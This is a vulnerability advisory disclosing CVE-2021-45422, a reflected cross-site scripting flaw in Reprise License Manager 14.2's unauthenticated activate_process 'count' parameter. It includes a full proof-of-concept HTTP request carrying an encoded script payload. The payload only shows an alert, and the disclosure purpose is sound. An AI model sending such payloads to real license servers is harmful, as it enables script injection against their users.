RLM 14.2 Cross Site Scripting

`# Product: RLM 14.2  
# Vendor: Reprise Software  
# CVE ID: CVE-2021-45422  
# Vulnerability Title: Reflected Cross-Site Scripting  
# Severity: Medium  
# Author(s): Giulia Melotti Garibaldi  
# Date: 2022-01-11  
#  
#############################################################  
Introduction:  
An issue was discovered in Reprise License Manager 14.2, Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/activate_process "count" parameter via GET. No authentication is required.  
  
Vulnerability PoC:  
  
GET http://HOST:5054/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E HTTP/1.1  
Host: HOST:5054  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: keep-alive  
  
`